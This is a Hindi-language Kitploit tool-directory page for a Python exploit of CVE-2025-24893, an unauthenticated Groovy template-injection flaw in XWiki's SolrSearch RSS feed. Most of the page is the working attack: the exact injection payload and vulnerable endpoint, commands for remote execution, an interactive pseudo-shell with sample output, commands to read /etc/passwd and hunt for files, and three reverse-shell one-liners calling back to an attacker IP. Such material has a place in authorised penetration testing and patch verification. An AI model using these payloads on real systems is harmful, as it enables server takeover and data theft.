Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24893 — XWiki में SolrSearch Macro के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/gotr00t0day/cve-2025-24893
शोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubgotr00t0day/cve-2025-24893

CVE-2025-24893

XWiki में SolrSearch Macro के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन

रिपॉजिटरी देखें
610 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

XWiki SSTI एक्सप्लॉइट

SolrSearch एंडपॉइंट में Groovy टेम्पलेट इंजेक्शन के माध्यम से XWiki सर्वर-साइड टेम्पलेट इंजेक्शन (SSTI) भेद्यता के लिए एक Python एक्सप्लॉइट।

भेद्यता

  • प्रकार: सर्वर-साइड टेम्पलेट इंजेक्शन (SSTI)
  • घटक: XWiki SolrSearch RSS फ़ीड
  • प्रभाव: रिमोट कोड निष्पादन
  • प्रभावित संस्करण: XWiki 15.10.8 (और संभावित रूप से अन्य)

आवश्यकताएँ

root@kitploit:~
pip3 install requests beautifulsoup4

उपयोग

भेद्यता के लिए परीक्षण

root@kitploit:~
./xwiki_exploit.py -u http://target --test

एकल कमांड निष्पादित करें

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "whoami"
./xwiki_exploit.py -u http://target.com -c "id"
./xwiki_exploit.py -u http://target.com -c "ls -la /tmp"

इंटरैक्टिव शेल

root@kitploit:~
./xwiki_exploit.py -u http://target.com

यह आपको एक इंटरैक्टिव स्यूडो-शेल देगा जहाँ आप कमांड चला सकते हैं:

root@kitploit:~
xwiki> whoami
xwiki
xwiki> pwd
/usr/lib/xwiki-jetty
xwiki> ls /home
oliver
xwiki> exit

डीबग मोड

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "id" --debug

कमांड-लाइन विकल्प

  • -u, --url URL: लक्ष्य URL (आवश्यक)
  • -c, --command CMD: एकल कमांड निष्पादित करें
  • --test: जाँचें कि लक्ष्य भेद्य है या नहीं
  • --no-verify-ssl: SSL प्रमाणपत्र सत्यापन अक्षम करें
  • --debug: डीबग आउटपुट सक्षम करें

उदाहरण

सूचना संग्रहण:

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "uname -a"
./xwiki_exploit.py -u http://target.com -c "cat /etc/os-release"
./xwiki_exploit.py -u http://target.com -c "cat /etc/passwd"

रोचक फ़ाइलें खोजें:

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "find /home -type f -readable 2>/dev/null"
./xwiki_exploit.py -u http://target.com -c "ls -la /var/lib/xwiki"

नेटवर्क जानकारी:

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "ip addr"
./xwiki_exploit.py -u http://target.com -c "netstat -tulpn"

रिवर्स शेल स्थापित करें:

root@kitploit:~
# On attacker machine, start listener:
nc -lvnp 1337

# From exploit (try different methods):
./xwiki_exploit.py -u http://target.com -c "bash -c 'bash -i >& /dev/tcp/IP/1337 0>&1'"
./xwiki_exploit.py -u http://target.com -c "nc -e /bin/sh IP 1337"
./xwiki_exploit.py -u http://target.com -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 1337 >/tmp/f"

तकनीकी विवरण

पेलोड संरचना

एक्सप्लॉइट निम्नलिखित SSTI पेलोड संरचना का उपयोग करता है:

root@kitploit:~
}}}{{async async=false}}{{groovy}}println("COMMAND".execute().text){{/groovy}}{{/async}}

शोषण प्रवाह

  1. पेलोड को URL-एन्कोड किया जाता है और भेद्य एंडपॉइंट पर भेजा जाता है:

    root@kitploit:~
    /xwiki/bin/view/Main/SolrSearch?media=rss&text=[PAYLOAD]
    
  2. सर्वर Groovy टेम्पलेट को संसाधित करता है और कमांड निष्पादित करता है

  3. आउटपुट RSS फ़ीड प्रतिक्रिया से इस प्रारूप में कैप्चर किया जाता है:

    root@kitploit:~
    search on [}}OUTPUT]
    
  4. एक्सप्लॉइट कमांड आउटपुट निकालने के लिए HTML प्रतिक्रिया को पार्स करता है

नोट्स

  • कमांड xwiki उपयोगकर्ता (uid=997) के रूप में निष्पादित होते हैं
  • कार्यशील निर्देशिका /usr/lib/xwiki-jetty है
  • कुछ कमांड विफल होने या पृष्ठभूमि में चलने पर आउटपुट उत्पन्न नहीं कर सकते हैं
  • जटिल कमांड के लिए, शेल स्क्रिप्ट या base64 एन्कोडिंग का उपयोग करने पर विचार करें

अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए है। इसका उपयोग केवल उन प्रणालियों पर करें जिनके परीक्षण की अनुमति आपके पास है।

टूल डाउनलोड करें